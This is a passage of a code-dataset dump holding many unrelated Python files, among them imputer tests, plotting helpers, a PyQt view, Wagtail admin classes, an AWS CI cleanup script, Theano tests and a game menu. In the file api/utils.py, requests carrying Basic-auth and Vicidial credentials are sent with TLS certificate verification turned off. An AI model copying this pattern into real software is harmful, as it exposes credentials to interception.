test_data_fit = self.fit_test_data(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n\n\n def test_fit_replace_value(self):\n imputer_value = [ 'NA', 'naaa' ] \n imputer = Imputer(imputer_value)\n process_data, cols_transform_value = imputer.fit(self.table_instance,replace_method=\"designated\", replace_value='111111', output_format = 'str')\n cols_transform_value_ground_true = [ '111111' for _ in range(10) ]\n test_data_fit = self.fit_test_data(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n\n def test_fit_none_replace_method(self):\n imputer_value = [ 'NA', 'naaa' ] \n imputer = Imputer(imputer_value)\n process_data, cols_transform_value = imputer.fit(self.table_instance, output_format = 'str')\n cols_transform_value_ground_true = [ '0' for _ in range(10) ]\n test_data_fit = self.fit_test_data(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n \n def test_fit_max_float(self):\n imputer = Imputer()\n process_data, cols_transform_value = imputer.fit(self.table_instance, \"max\", output_format = 'float')\n cols_transform_value_ground_true = [0.963102,1.467675,0.829202,0.772457,1.000835,0.962702,1.077099,1.053586,2.996525,0.961696]\n imputer_value = [ '', 'none', 'na', 'null' ] \n test_data_fit = self.fit_test_data_float(self.test_data, cols_transform_value_ground_true, imputer_value)\n\n self.assertListEqual(self.table_to_list(process_data), test_data_fit)\n self.assertListEqual(cols_transform_value, cols_transform_value_ground_true)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"federatedml/feature/test/imputer_test.py","file_name":"imputer_test.py","file_ext":"py","file_size_in_byte":6925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"453822289","text":"\"\"\"\n\n\"\"\"\n\nclass Box:\n\n def __init__(self, number = 0, name = \"\", enabled = True):\n\n self._num = number\n self._na = name\n self._boo = enabled\n\nclass ColorBox:\n def __init__(self, number=0, name=\"\", enabled=True, color=\"\"):\n self._num = number\n 
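# same abbreviated attribute names as Box, plus an extra color field below\n 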
self._na = name\n self._boo = enabled\n self._col = color\n\n\nb1 = Box()\nb2 = Box()\nb3 = Box()\nb4 = Box()\nb5 = Box()\n\nlist_1 = [b1, b2, b3, b4, b5]\n","sub_path":"ect/sm_11-07.py","file_name":"sm_11-07.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"635457845","text":"# Module name: multiprocessing\nimport multiprocessing\nimport time\n\n\n# Upload task\ndef upload():\n for i in range(5):\n print('Uploading...', i+1)\n time.sleep(0.1)\n\n\ndef download():\n for i in range(5):\n print('Downloading movie.......', i+1)\n time.sleep(0.1)\n\n\nif __name__ == '__main__':\n # Create two child processes\n # The upload runs in its own child process\n p1 = multiprocessing.Process(target=upload)\n # The download runs in its own child process\n p2 = multiprocessing.Process(target=download)\n\n # Processes must be started before they run\n p1.start()\n p2.start()\n","sub_path":"07-进程-多进程体验进程.py","file_name":"07-进程-多进程体验进程.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"391261347","text":"from kzpy3.utils import *\n\nimport matplotlib\ntry:\n import cv2\nexcept:\n print(\"Couldn't import cv\")\n\n\nMacOSX = False\nif '/Users/' in home_path:\n MacOSX = True\n\nif MacOSX:\n matplotlib.use(u'MacOSX')\n\n\n###########\n'''\ne.g.\nfrom kzpy3.vis import *; kzpy_vis_test()\n'''\n################\n\nimport matplotlib.pyplot as plt # the Python plotting package\nplt.ion()\nplot = plt.plot\nhist = plt.hist\nxlim = plt.xlim\nylim = plt.ylim\nclf = plt.clf\npause = plt.pause\nfigure = plt.figure\ntitle = plt.title\nplt.ion()\nplt.show()\nPP,FF = plt.rcParams,'figure.figsize'\n\n\ndef kzpy_vis_test():\n img_dic = get_some_images()\n ppff = PP[FF]\n PP[FF] = 3,3\n mi(img_dic['bay'],'bay')\n PP[FF] = ppff\n plt.figure('hist')\n plt.hist(np.random.randn(10000),bins=100)\n True\n\ndef hist(data,bins=100):\n \"\"\"\n default hist behavior\n \"\"\"\n plt.clf()\n plt.hist(data,bins=bins)\n pass\nplot = plt.plot\nfigure = plt.figure\nclf=plt.clf\n\n\n\ntry:\n # - These allow for real-time display updating\n from cStringIO import StringIO\n import scipy.ndimage as nd\n import PIL.Image\n if MacOSX:\n from IPython.display import clear_output, Image, display\n def showarray(a, fmt='jpeg'):\n a = np.uint8(np.clip(255.0*z2o(a), 0, 255))\n f = StringIO()\n PIL.Image.fromarray(a).save(f, fmt)\n display(Image(data=f.getvalue()))\nexcept:\n print(\"kzpy3.vis: PIL image display not imported.\")\n\ndef toolbar():\n plt.rcParams['toolbar'] = 'toolbar2'\n \n######################\n#\ndef mi(\n image_matrix,\n figure_num = 1,\n subplot_array = [1,1,1],\n img_title = '',\n img_xlabel = 'x',\n img_ylabel = 'y',\n cmap = 'gray',\n toolBar = True,\n do_clf = True,\n do_axis = False ):\n \"\"\"\n My Imagesc, displays a matrix as grayscale image if 2d, or color if 3d.\n Can take different inputs -- e.g.,\n\n from matrix:\n\n from kzpy3.vis import *\n mi(np.random.rand(256,256),99,[1,1,1],'random matrix')\n\n from path:\n mi(opjh('Desktop','conv1'),1,[5,5,0])\n\n from list:\n l = load_img_folder_to_list(opjh('Desktop','conv5'))\n mi(l,2,[4,3,0])\n\n from dict:\n mi(load_img_folder_to_dict(opjh('Desktop','conv5')),1,[3,4,0])\n \"\"\"\n if type(image_matrix) == str:\n mi(load_img_folder_to_dict(image_matrix),image_matrix,subplot_array,img_title,img_xlabel,img_ylabel,cmap,toolBar)\n return\n\n if type(image_matrix) == list:\n if np.array(subplot_array).max() < 2:\n subplot_array = [1,len(image_matrix),0]\n for i in range(len(image_matrix)):\n 
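# recurse: draw each element of the list into its own subplot slot\n 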
mi(image_matrix[i],figure_num,[subplot_array[0],subplot_array[1],i+1],img_title,img_xlabel,img_ylabel,cmap,toolBar)\n return\n\n if type(image_matrix) == dict:\n if np.array(subplot_array).max() < 2:\n subplot_array = [1,len(image_matrix),0]\n i = 0\n img_keys = sorted(image_matrix.keys(),key=natural_keys)\n for k in img_keys:\n mi(image_matrix[k],figure_num,[subplot_array[0],subplot_array[1],i+1],img_title,img_xlabel,img_ylabel,cmap,toolBar)\n i += 1\n return \n\n if toolBar == False:\n plt.rcParams['toolbar'] = 'None'\n else:\n plt.rcParams['toolbar'] = 'toolbar2'\n\n f = plt.figure(figure_num)\n if do_clf:\n #print('plt.clf()')\n plt.clf()\n\n if True:\n f.subplots_adjust(bottom=0.05)\n f.subplots_adjust(top=0.95)\n f.subplots_adjust(wspace=0.1)\n f.subplots_adjust(hspace=0.1)\n f.subplots_adjust(left=0.05)\n f.subplots_adjust(right=0.95)\n if False:\n f.subplots_adjust(bottom=0.0)\n f.subplots_adjust(top=0.95)\n f.subplots_adjust(wspace=0.0)\n f.subplots_adjust(hspace=0.1)\n f.subplots_adjust(left=0.0)\n f.subplots_adjust(right=1.0)\n f.add_subplot(subplot_array[0],subplot_array[1],subplot_array[2])\n imgplot = plt.imshow(image_matrix, cmap)\n imgplot.set_interpolation('nearest')\n if not do_axis:\n plt.axis('off')\n if len(img_title) > 0:# != 'no title':\n plt.title(img_title)\n#\n######################\n\n\n\n\n\n\n\n\n\ndef mp(args,figure_num=1, subplot_array=[1,1,1],\n title='', xlabel='', ylabel='', xlim=[], ylim=[], toolBar=False):\n\n if toolBar == False:\n plt.rcParams['toolbar'] = 'None'\n else:\n plt.rcParams['toolbar'] = 'toolbar2'\n\n f = plt.figure(figure_num)\n\n if False:\n f.subplots_adjust(bottom=0.05)\n f.subplots_adjust(top=0.95)\n f.subplots_adjust(wspace=0.1)\n f.subplots_adjust(hspace=0.1)\n f.subplots_adjust(left=0.05)\n f.subplots_adjust(right=0.95)\n\n f.add_subplot(subplot_array[0],subplot_array[1],subplot_array[2])\n imgplot = plt.plot(*args)\n if len(title) > 0:# != 'no title':\n plt.title(title)\n else:\n plt.title(str(subplot_array[2]))\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n if len(xlim)==2:\n plt.xlim(xlim) \n if len(ylim)==2:\n plt.ylim(ylim)\n\n\ndef yb_color_modulation_of_grayscale_image(img,y,b,opt_lower_contrast=True):\n\n if len(np.shape(img))>2:\n img = np.mean(img,axis=2)\n img = z2o(img)\n\n if opt_lower_contrast:\n print('low contrast option')\n img = (1.0+img)/3.0\n\n y = z2o(y)\n b = z2o(b)\n\n ci = np.zeros((np.shape(img)[0],np.shape(img)[1],3))\n print(np.shape(ci))\n for i in range(3):\n ci[:,:,i] = 1.0*img\n ci = ci/np.max(ci)\n\n for i in range(3):\n ci[:,:,i] *= (1-y)\n for i in [0,1]:\n ci[:,:,i] += y\n\n for i in range(3):\n ci[:,:,i] *= (1-b)\n for i in [2]:\n ci[:,:,i] += b\n \n return ci\n\n \n \ndef get_some_images():\n '''\n Load some images that can be used for demos, etc.\n e.g., img_dic = get_some_images(); mi(img_dic['bay'])\n '''\n img_dic = {}\n img_dic['bay'] = imread(opj(home_path,'Pictures','bay2.png'))\n return img_dic\n\n\n\n# take an array of shape (n, height, width) or (n, height, width, channels)\n# and visualize each (height, width) thing in a grid of size approx. 
sqrt(n) by sqrt(n)\ndef vis_square(data_in, padsize=1, padval=0):\n data = data_in.copy()\n data -= data.min()\n data /= data.max()\n \n # force the number of filters to be square\n n = int(np.ceil(np.sqrt(data.shape[0])))\n padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)\n data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))\n \n # tile the filters into an image\n data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))\n data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])\n \n return data\n\n\n\nimport matplotlib.colors\ndef make_colormap(seq):\n \"\"\"Return a LinearSegmentedColormap\n seq: a sequence of floats and RGB-tuples. The floats should be increasing\n and in the interval (0,1).\n \"\"\"\n seq = [(None,) * 3, 0.0] + list(seq) + [1.0, (None,) * 3]\n cdict = {'red': [], 'green': [], 'blue': []}\n for i, item in enumerate(seq):\n if isinstance(item, float):\n r1, g1, b1 = seq[i - 1]\n r2, g2, b2 = seq[i + 1]\n cdict['red'].append([item, r1, r2])\n cdict['green'].append([item, g1, g2])\n cdict['blue'].append([item, b1, b2])\n return matplotlib.colors.LinearSegmentedColormap('CustomMap', cdict)\n\n''' from http://stackoverflow.com/questions/16834861/create-own-colormap-using-matplotlib-and-plot-color-scale\ne.g.,\n\nc = matplotlib.colors.ColorConverter().to_rgb\nrvb = make_colormap(\n [c('red'), c('violet'), 0.33, c('violet'), c('blue'), 0.66, c('blue')])\nN = 1000\narray_dg = np.random.uniform(0, 10, size=(N, 2))\ncolors = np.random.uniform(-2, 2, size=(N,))\nplt.scatter(array_dg[:, 0], array_dg[:, 1], c=colors, cmap=rvb)\nplt.colorbar()\nplt.show()\n'''\n\n\n\n\n\ndef load_img_folder_to_dict(img_folder):\n '''Assume that *.* selects only images.'''\n img_fns = gg(opj(img_folder,'*.*'))\n imgs = {}\n for f in img_fns:\n imgs[f.split('/')[-1]] = imread(f)\n return imgs\n\ndef load_img_folder_to_list(img_folder):\n return dict_to_sorted_list(load_img_folder_to_dict(img_folder))\n\n\n\ndef my_scatter(x,y,xmin,xmax,fig_wid,fig_name):\n plt.figure(fig_name,(fig_wid,fig_wid))\n plt.clf()\n plt.plot(x,y,'bo')\n plt.title(np.corrcoef(x,y)[0,1])\n plt.xlim(xmin,xmax)\n plt.ylim(xmin,xmax)\n\n\n\ndef apply_rect_to_img(img,value,min_val,max_val,pos_color,neg_color,rel_bar_height,rel_bar_thickness,center=False,reverse=False,horizontal=False):\n #print(value)\n h,w,d = shape(img)\n p = (value - min_val) / (max_val - 1.0*min_val)\n if reverse:\n p = 1.0 - p\n if p > 1:\n p = 1\n if p < 0:\n p = 0\n wp = int(p*w)\n hp = int(p*h)\n bh = int((1-rel_bar_height) * h)\n bt = int(rel_bar_thickness * h)\n bw = int((1-rel_bar_height) * w)\n\n # integer division keeps the slice indices ints under Python 3\n if horizontal:\n if center:\n if wp < w//2:\n img[(bh-bt//2):(bh+bt//2),(wp):(w//2),:] = neg_color\n else:\n img[(bh-bt//2):(bh+bt//2),(w//2):(wp),:] = pos_color\n else:\n img[(bh-bt//2):(bh+bt//2),0:wp,:] = pos_color\n else:\n if center:\n if hp < h//2:\n img[(hp):(h//2),(bw-bt//2):(bw+bt//2),:] = neg_color\n else:\n img[(h//2):(hp),(bw-bt//2):(bw+bt//2),:] = pos_color\n\n else:\n img[hp:h,(bw-bt//2):(bw+bt//2),:] = pos_color\n\n\ndef plt_square():\n plt.gca().set_aspect('equal',adjustable='box')\n plt.draw()\n\n\n\ndef function_close_all_windows():\n plt.close('all')\nCA = function_close_all_windows\n\n\n\ndef mi_or_cv2_animate(img_array,cv=True,delay=30,title='animate'):\n if type(img_array)==np.ndarray:\n for i in range(len(img_array)):\n mi_or_cv2(img_array[i],cv,delay,title) \n elif type(img_array)==list:\n for i in 
range(len(img_array)):\n mi_or_cv2(img_array[i],cv,delay,title)\n else:\n print('I am confused')\n assert(False)\n\ndef mi_or_cv2(img,cv=True,delay=30,title='animate'):\n if cv:\n cv2.imshow(title,cv2.cvtColor(img,cv2.COLOR_RGB2BGR))\n if cv2.waitKey(delay) & 0xFF == ord('q'):\n pass\n else:\n mi(img,title)\n pause(0.0001)\n\n","sub_path":"vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":10333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"254955347","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nimport numpy as np\nimport qimage2ndarray\nimport cv2 as cv\n\n\nclass backImage(QtWidgets.QGraphicsView):\n def __init__(self, parent=None):\n super(backImage, self).__init__(parent)\n self.wid = 1200\n self.heit = 900\n self.setFixedSize(self.wid, self.heit)\n self.setScene(QtWidgets.QGraphicsScene(self))\n self.pixmapItem = (\n QtWidgets.QGraphicsPixmapItem()\n ) # check if every time you open a new image the old image is still an item\n self.scene().addItem(self.pixmapItem)\n self._path_item = None\n self.img = None\n self.filename = \"\"\n self.setFrameStyle(QFrame.NoFrame)\n\n def initial_path(self):\n self._path = QtGui.QPainterPath()\n pen = QtGui.QPen(\n QtGui.QColor(\"white\"), 1.5, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap\n )\n self._path_item = self.scene().addPath(self._path, pen)\n\n # @QtCore.pyqtSlot()\n def setImage(self, width, height):\n self.scene().clear()\n self.wid = width\n self.heit = height\n print(\"width: {0} height {1}\".format(width, height))\n self.scene().setSceneRect(0, 0, self.wid, self.heit)\n self.pixmapItem = (\n QtWidgets.QGraphicsPixmapItem()\n ) # check if every time you open a new image the old image is still an item\n self.scene().addItem(self.pixmapItem)\n self.setFixedSize(width, height)\n\n def mousePress(self, pos):\n try:\n self.initial_path()\n\n self._path.moveTo(self.mapToScene(pos))\n self._path_item.setPath(self._path)\n self.scene().addItem(self.pixmapItem)\n\n self._path_item.setPath(self._path)\n except Exception as e:\n print(\"press event {0}\".format(e))\n # super(backImage, self).mousePressEvent(event)\n\n def mouseMove(self, pos):\n self._path.lineTo(self.mapToScene(pos))\n self._path_item.setPath(self._path)\n # super(backImage, self).mouseMoveEvent(event)\n\n def mouseRelease(self, pos):\n self._path.lineTo(self.mapToScene(pos))\n self._path.closeSubpath()\n self._path_item.setPath(self._path)\n # self._path_item.setBrush(QtGui.QBrush(QtGui.QColor(255, 0, 0)))\n self._path_item.setBrush(QtGui.QBrush(QtGui.QColor(\"white\")))\n self._path_item = None\n\n # super(backImage, self).mouseReleaseEvent(event)\n\n def fullSelect(self):\n self.initial_path()\n self._path.moveTo(self.mapToScene(QPoint(1, 1)))\n self._path_item.setPath(self._path)\n self.scene().addItem(self._path_item)\n self._path_item.setPath(self._path)\n\n self._path.lineTo(self.mapToScene(QPoint(self.wid - 1, 1)))\n self._path_item.setPath(self._path)\n\n self._path.lineTo(self.mapToScene(QPoint(self.wid - 1, self.heit - 1)))\n self._path_item.setPath(self._path)\n\n self._path.lineTo(self.mapToScene(QPoint(1, self.heit - 1)))\n self._path_item.setPath(self._path)\n\n self._path.lineTo(self.mapToScene(QPoint(1, 1)))\n self._path.closeSubpath()\n self._path_item.setPath(self._path)\n self._path_item.setBrush(QtGui.QBrush(QtGui.QColor(\"white\")))\n self._path_item = None\n\n 
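# the closed path now covers the whole scene with a white fill\n 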
pass\n\n def save(self):\n rect = self.scene().sceneRect()\n self.img = QtGui.QImage(rect.width(), rect.height(), QtGui.QImage.Format_ARGB32)\n painter = QtGui.QPainter(self.img)\n rectf = QRectF(0, 0, self.img.rect().width(), self.img.rect().height())\n self.scene().render(painter, rectf, rect)\n try:\n npImg = qimage2ndarray.rgb_view(self.img)\n # filename, _ = QtWidgets.QFileDialog.getSaveFileName(\n # None, \"save Image\", self.filename, \"Image Files (*.png)\"\n # )\n # if filename:\n # cv.imwrite(filename,npImg)\n # cv.imshow(\"img\",npImg)\n return cv.cvtColor(npImg,cv.COLOR_BGR2GRAY)\n except Exception as e:\n print(e)\n return None\n\n# if __name__ == \"__main__\":\n# app = QtWidgets.QApplication(sys.argv)\n# w = QWidget()\n# btnSave = QPushButton(\"Save image\")\n# view = GraphicsView()\n# view.setImage()\n# w.setLayout(QVBoxLayout())\n# w.layout().addWidget(btnSave)\n# w.layout().addWidget(view)\n# btnSave.clicked.connect(lambda: view.save())\n# w.show()\n# sys.exit(app.exec_())\n","sub_path":"BaoSteelProject1/UI/step4_backImage.py","file_name":"step4_backImage.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"178010582","text":"import os\nimport json\nimport logging\nimport requests\nimport dotenv\n\ndotenv.load_dotenv()\n\nHEADERS = {'Authorization': 'Basic {}'.format(os.environ.get('AUTH_1C'))}\nBASE_URL_1C = os.environ.get('BASE_URL_1C')\nDEBUG = os.environ.get('DEBUG', '') == 'True'\n\nURL_VICIDIAL = os.environ.get('VICIDIAL_URL')\n\n\ndef make_request_to_1c(resource, req):\n url = BASE_URL_1C + resource\n res = None # keep res defined even if the request itself raises\n try:\n res = requests.post(\n url,\n data=json.dumps(req, ensure_ascii=False).encode('utf-8'),\n headers=HEADERS,\n verify=False\n )\n rt = res.json()\n if DEBUG:\n print('====================REQUEST====================')\n print(req)\n print('====================RESPONSE====================')\n print(res.text)\n print('====================END====================')\n except Exception as e:\n logger = logging.getLogger('vicidial')\n logger.error(f'1C error: {str(e)} res: {res.text if res is not None else \"no response\"}')\n rt = {'error': 'connection error'}\n return rt\n\n\ndef make_request_to_vicidial(resource, data):\n url = URL_VICIDIAL + resource\n req_data = {\n 'user': os.environ.get('VICIDIAL_LOGIN'),\n 'pass': os.environ.get('VICIDIAL_PASS'),\n 'source': 'test'\n }\n req_data.update(data)\n response = requests.get(\n url,\n params=req_data,\n verify=False)\n return {'res': response.text}\n","sub_path":"api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"311169755","text":"from django.contrib import admin\nfrom wagtail.contrib.modeladmin.options import ModelAdmin, modeladmin_register\n\nfrom .models import Product, Promotion, CompanyPage\n\nclass ProductAdmin(ModelAdmin):\n model = Product\n menu_label = 'Products'\n menu_icon = 'placeholder'\n add_to_settings_menu = False\n exclude_from_explorer = False\n list_display = ('title', 'company', 'service_type',)\n search_fields = ('title', 'company', 'service_type',)\n\n\nclass PromotionAdmin(ModelAdmin):\n model = Promotion\n menu_label = 'Promotions'\n menu_icon = 'placeholder'\n add_to_settings_menu = False\n exclude_from_explorer = False\n list_display = ('title', 'company',)\n search_fields = ('title', 'company',)\n\n\nclass CompanyAdmin(ModelAdmin):\n model = CompanyPage\n menu_label = 'Companies'\n menu_icon = 
'placeholder'\n add_to_settings_menu = False\n exclude_from_explorer = False\n list_display = ('title',)\n search_fields = ('title',)\n\n\nmodeladmin_register(PromotionAdmin)\nmodeladmin_register(ProductAdmin)\nmodeladmin_register(CompanyAdmin)","sub_path":"services/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"508858852","text":"import sys\nsys.path.insert(0, \"../..\")\n\nfrom payments_alpha_stack_env import policy_name, lambda_name\nfrom payments_alpha_common import iam_client\nfrom scripts.ci.add_sqs_policy_to_lambda_role import get_lambda_by_name, get_role_name_by_arn\n\n\ndef delete_policy(policy_name, role_name):\n iam_client.delete_role_policy(\n RoleName=role_name,\n PolicyName=policy_name\n )\n\n\ndef does_role_have_policy(policy_name, role_name):\n response = iam_client.list_role_policies(\n RoleName=role_name\n )\n for policy in response['PolicyNames']:\n if policy == policy_name:\n return True\n return False\n\n\ndef main():\n lambda_function = get_lambda_by_name(lambda_name)\n if lambda_function is not None:\n lambda_role_arn = lambda_function['Role']\n lambda_role_name = get_role_name_by_arn(lambda_role_arn)\n if does_role_have_policy(policy_name, lambda_role_name):\n delete_policy(policy_name, lambda_role_name)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"infrastructure/aws/scripts/ci/delete_lambda_policy.py","file_name":"delete_lambda_policy.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"522269969","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom plotly.offline import plot\n\n\nclass CellVolume():\n def __init__(self, vol_type, vol_size, offset=10, draw_dist=False):\n self.vol_type = vol_type\n self.vol_size = vol_size\n if self.vol_type == 'poisson':\n self.vol_grid = np.random.poisson(lam=offset, size=(self.vol_size, 3))\n elif self.vol_type == 'gaussian':\n self.vol_grid = np.random.normal(loc=offset, scale=1., size=(self.vol_size, 3))\n elif self.vol_type == 'exponential':\n self.vol_grid = np.random.exponential(scale=offset, size=(self.vol_size, 3))\n else:\n print('no suitable distribution')\n\n self.assignAxes()\n\n fig = None # keep fig defined when draw_dist is False; plot3Dgraph builds its own figure\n if draw_dist:\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(self.x, self.y, self.z)\n plt.show()\n\n self.createCells(fig)\n\n print('finished building volume')\n\n\n def assignAxes(self):\n '''\n distribute points on grid axes\n '''\n self.x = self.vol_grid[:,0]\n self.y = self.vol_grid[:,1]\n self.z = self.vol_grid[:,2]\n\n def createCells(self, fig):\n '''\n Iterate over every point in the grid and decide by a probability\n parameter whether this point will become a cell or not\n '''\n x_vol, y_vol, z_vol = self.x, self.y, self.z\n\n for i in range(self.vol_size):\n if self.decision(probability=0.1):\n print(i, self.vol_size, '---', self.x[i], self.y[i], self.z[i])\n diameter = 10\n\n val_x, val_y, val_z = self.x[i], self.y[i], self.z[i]\n u = np.linspace(0, 2 * np.pi, diameter)\n v = np.linspace(0, np.pi, diameter)\n x = diameter * np.outer(np.cos(u),np.sin(v)) + val_x\n y = diameter * np.outer(np.sin(u), np.sin(v)) + val_y\n z = diameter * np.outer(np.ones(np.size(u)), np.cos(v)) + val_z\n\n self.plot3Dgraph(fig, x, y, z)\n # self.drawBall(i, diameter=5)\n\n def decision(self, probability=0.1):\n return np.random.random() < probability\n\n # def 
drawBall(self, idx, diameter=5):\n # val_x, val_y, val_z = self.x[idx], self.y[idx], self.z[idx]\n # u = np.linspace(0, 2 * np.pi, diameter)\n # v = np.linspace(0, np.pi, diameter)\n # x = diameter * np.outer(np.cos(u),np.sin(v)) + val_x\n # y = diameter * np.outer(np.sin(u), np.sin(v)) + val_y\n # z = diameter * np.outer(np.ones(np.size(u)), np.cos(v)) + val_z\n\n\n def plot3Dgraph(self, fig, x, y, z):\n import plotly.graph_objs as go\n\n surface = go.Surface(x=x, y=y, z=z)\n data = go.Data([surface])\n\n layout = go.Layout(\n title='Parametric Plot',\n scene=go.Scene(\n xaxis=go.XAxis(\n gridcolor='rgb(255, 255, 255)',\n zerolinecolor='rgb(255, 255, 255)',\n showbackground=True,\n backgroundcolor='rgb(230, 230,230)'\n ),\n yaxis=go.YAxis(\n gridcolor='rgb(255, 255, 255)',\n zerolinecolor='rgb(255, 255, 255)',\n showbackground=True,\n backgroundcolor='rgb(230, 230,230)'\n ),\n zaxis=go.ZAxis(\n gridcolor='rgb(255, 255, 255)',\n zerolinecolor='rgb(255, 255, 255)',\n showbackground=True,\n backgroundcolor='rgb(230, 230,230)'\n )\n )\n )\n\n fig = go.Figure(data=data,layout=go.Layout(title='Offline Plotly Testing',\n width = 800,height = 500, xaxis = dict(title = 'X-axis'), yaxis = dict(title = 'Y-axis')))\n\n plot(fig,show_link = False)\n","sub_path":"scripts/simulate3DVol.py","file_name":"simulate3DVol.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"351122650","text":"from numpy.testing import assert_allclose\nfrom theano import tensor\nfrom theano.tensor.shared_randomstreams import RandomStreams\n\nfrom blocks.bricks import Brick\nfrom blocks.graph import apply_noise, ComputationGraph\nfrom tests.bricks.test_bricks import TestBrick\n\n\ndef test_application_graph_auxiliary_vars():\n X = tensor.matrix('X')\n Brick.lazy = True\n brick = TestBrick()\n Y = brick.access_application_call(X)\n graph = ComputationGraph(outputs=[Y])\n test_val_found = False\n for var in graph.variables:\n if var.name == 'test_val':\n test_val_found = True\n break\n assert test_val_found\n\n\ndef test_computation_graph():\n x = tensor.matrix('x')\n y = tensor.matrix('y')\n z = x + y\n a = z.copy()\n a.name = 'a'\n b = z.copy()\n b.name = 'b'\n r = tensor.matrix('r')\n\n cg = ComputationGraph([a, b])\n assert set(cg.inputs) == {x, y}\n assert set(cg.outputs) == {a, b}\n assert set(cg.variables) == {x, y, z, a, b}\n assert ComputationGraph(a).inputs == cg.inputs\n\n cg2 = cg.replace({z: r})\n assert set(cg2.inputs) == {r}\n assert set([v.name for v in cg2.outputs]) == {'a', 'b'}\n\n\ndef test_apply_noise():\n x = tensor.scalar()\n y = tensor.scalar()\n z = x + y\n\n cg = ComputationGraph([z])\n rng = RandomStreams(1)\n noised_cg = apply_noise(cg, [y], 1, rng)\n assert_allclose(noised_cg.outputs[0].eval({x: 1., y: 1.}),\n 2 + RandomStreams(1).normal().eval())\n","sub_path":"tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"63087148","text":"from constants import *\nimport arcade, time\n\n\nBUTTONS = {\n 'big_left': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 10, SCREEN_HEIGHT / 9, \"arcade.close_window()\"],\n 'big_right': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 1.1, SCREEN_HEIGHT / 9, \"self.window.show_view(LevelSelect())\"],\n 'author': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH 
/ 15, SCREEN_HEIGHT / 1.05, \"self.window.show_view(Author())\"],\n 'instruction': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 1.07, SCREEN_HEIGHT / 1.05, \"self.window.show_view(Instructions())\"],\n 'scores': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 1.2, SCREEN_HEIGHT / 1.05, \"self.window.show_view(ScoreTable())\"],\n 'first_level': [arcade.load_texture(\"images/HUD/hud1.png\"),\n SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.64],\n 'second_level': [arcade.load_texture(\"images/HUD/hud2.png\"),\n SCREEN_WIDTH / 1.2, SCREEN_HEIGHT / 1.5],\n 'escape_level': [arcade.load_texture(\"images/HUD/hudX.png\"),\n SCREEN_WIDTH / 6, SCREEN_HEIGHT / 2.5],\n 'menu': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 10, SCREEN_HEIGHT / 9, \"self.window.show_view(GameMenu())\"]\n}\n\n\nclass GameMenu(arcade.View):\n def __init__(self):\n super().__init__()\n\n # sounds\n self.menu_select = arcade.load_sound(\"sounds/menu_selection_click.wav\")\n\n def on_draw(self):\n \"\"\" Draw the menu \"\"\"\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"png_ground/BG/BG.png\"))\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"images/game_menu.png\"))\n arcade.draw_text(\"JUNGLE ADVENTURE\", SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.3,\n arcade.color.ORANGE_PEEL, font_size=40, anchor_x=\"center\")\n self.draw_control_buttons()\n\n def draw_control_buttons(self):\n arcade.draw_scaled_texture_rectangle(BUTTONS['big_left'][1], BUTTONS['big_left'][2],\n 